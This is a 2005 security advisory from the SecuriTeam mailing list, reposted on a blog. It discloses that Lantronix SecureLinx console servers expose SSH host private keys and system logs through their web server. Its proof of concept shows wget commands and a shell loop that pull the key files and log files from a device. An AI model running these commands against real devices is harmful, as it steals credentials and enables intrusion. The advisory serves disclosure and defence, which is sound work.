Monday, July 25, 2005

[UNIX] Lantronix SecureLinx Console Server Information Disclosure

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Lantronix SecureLinx Console Server Information Disclosure
------------------------------------------------------------------------

SUMMARY

"The
<http://www.lantronix.com/data-center-management/console-servers/securelinx-slc.html> SecureLinx SLC console manager provides secure, remote access to servers and IT infrastructure equipment, whether it s located down the hall or across the globe. "

A vulnerability discovered in Lantronix's SecureLinx allows retrieval of
the server's ssh-private keys and system logfiles.

DETAILS

Vulnerable Systems:
* All models of SLC series (SLC8, 16, 32, 48)
* SLC32, Software version: 2.0, 3.0

Lantronix console servers come with a mini_httpd that doesn't validate the
local host's UNIX ACLs. This allows remote attackers to retrieve the files
located under the /etc/ssh directory. This renders the ssh-encryption
close to useless. In addition attackers can read the log files located
under /cifsshare/logs (Though the directory is named /cifsshare/logs/ it
contains system logs, potentially also snifferlogs from serial console
sessions).

Note that console servers provide an administrative console access to
devices hooked up on their serial lines (up to 48).

Vendor Status:
Vendor Confirmation for SLC-Series, Firmware 2.0 (researched), 3.0
(current)

Patch Availability:
Bugfix pending. Vendor is working on 3.1, to be released in August.

Proof of concept:
myprompt:~ # ssh slc
The authenticity of host 'slc (192.168.50.205)' can't be established.
RSA key fingerprint is d5:d8:93:33:db:b3:80:91:74:79:be:e7:ff:f6:c6:41.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'slc,192.168.50.205' (RSA) to the list of known
hosts.

Welcome to the SLC

login: root
Password: Connection to slc closed.
myprompt:~ # tail -1 .ssh/known_hosts
slc,192.168.50.205 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g09
9yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs
7z4EGHiYcB25gIgX6fQrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0=
myprompt:~ # wget -q -O - https://slc/etc
<HTML><HEAD><TITLE>Index of etc/</TITLE></HEAD>
<BODY BGCOLOR="#99cc99"><H4>Index of etc/</H4>
<PRE>
-rw------- 1 root 672 Jan 1 1970 ssh_host_dsa_key
-rw-r--r-- 1 root 601 Jan 1 1970 ssh_host_dsa_key.pub
-rw------- 1 root 526 Jan 1 1970 ssh_host_key
-rw-r--r-- 1 root 330 Jan 1 1970 ssh_host_key.pub
-rw------- 1 root 883 Jan 1 1970 ssh_host_rsa_key
-rw-r--r-- 1 root 221 Jan 1 1970 ssh_host_rsa_key.pub
</PRE>
<HR>
<ADDRESS><A
HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.15c 02m
ay2001</A></ADDRESS>
</BODY></HTML>
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoX
E1e8g099yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9Af
iNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs7z4EGHiYcB25gIgX6f
Qrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0= root@(none)
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key | grep -w KEY
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_dsa_key | grep -w KEY
-----BEGIN DSA PRIVATE KEY-----
-----END DSA PRIVATE KEY-----
myprompt:~ # wget -O - -q https://slc/cifsshare/logs/
<HTML><HEAD><TITLE>Index of cifsshare/logs/</TITLE></HEAD>
<BODY BGCOLOR="#99cc99"><H4>Index of cifsshare/logs/</H4>
<PRE>
lrwxrwxrwx Oct 21 2004 authentication <A HREF="->
./../../var/log/secure">-> ../../../var/log/secure</A>
lrwxrwxrwx Oct 21 2004 devports <A HREF="->
./../../var/log/devports">-> ../../../var/log/devports</A>
lrwxrwxrwx Oct 21 2004 diag <A HREF="-> ../../../var/log/diag">->
./../../var/log/diag</A>
lrwxrwxrwx Oct 21 2004 general <A HREF="->
./../../var/log/general">-> ../../../var/log/general</A>
lrwxrwxrwx Oct 21 2004 network <A HREF="->
./../../var/log/network">-> ../../../var/log/network</A>
lrwxrwxrwx Oct 21 2004 services <A HREF="->
./../../var/log/services">-> ../../../var/log/services</A>
lrwxrwxrwx Oct 21 2004 sw <A HREF="-> ../../../var/log/sw">->
./../../var/log/sw</A>
</PRE>
<HR>
<ADDRESS><A
HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.15c
02may2001</A></ADDRESS>
</BODY></HTML>
myprompt:~ # for i in `lynx -dump -nolist https://slc/cifsshare/logs/ |awk
'{ print $5 }'`; do echo ; echo ---$i---; wget -O - -q
https://slc/cifsshare/logs/$i; done
..
..

ADDITIONAL INFORMATION

The information has been provided by Dr. Dirk Wetter.
The original article can be found at: <http://drwetter.org/>
http://drwetter.org/

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments:

Post a Comment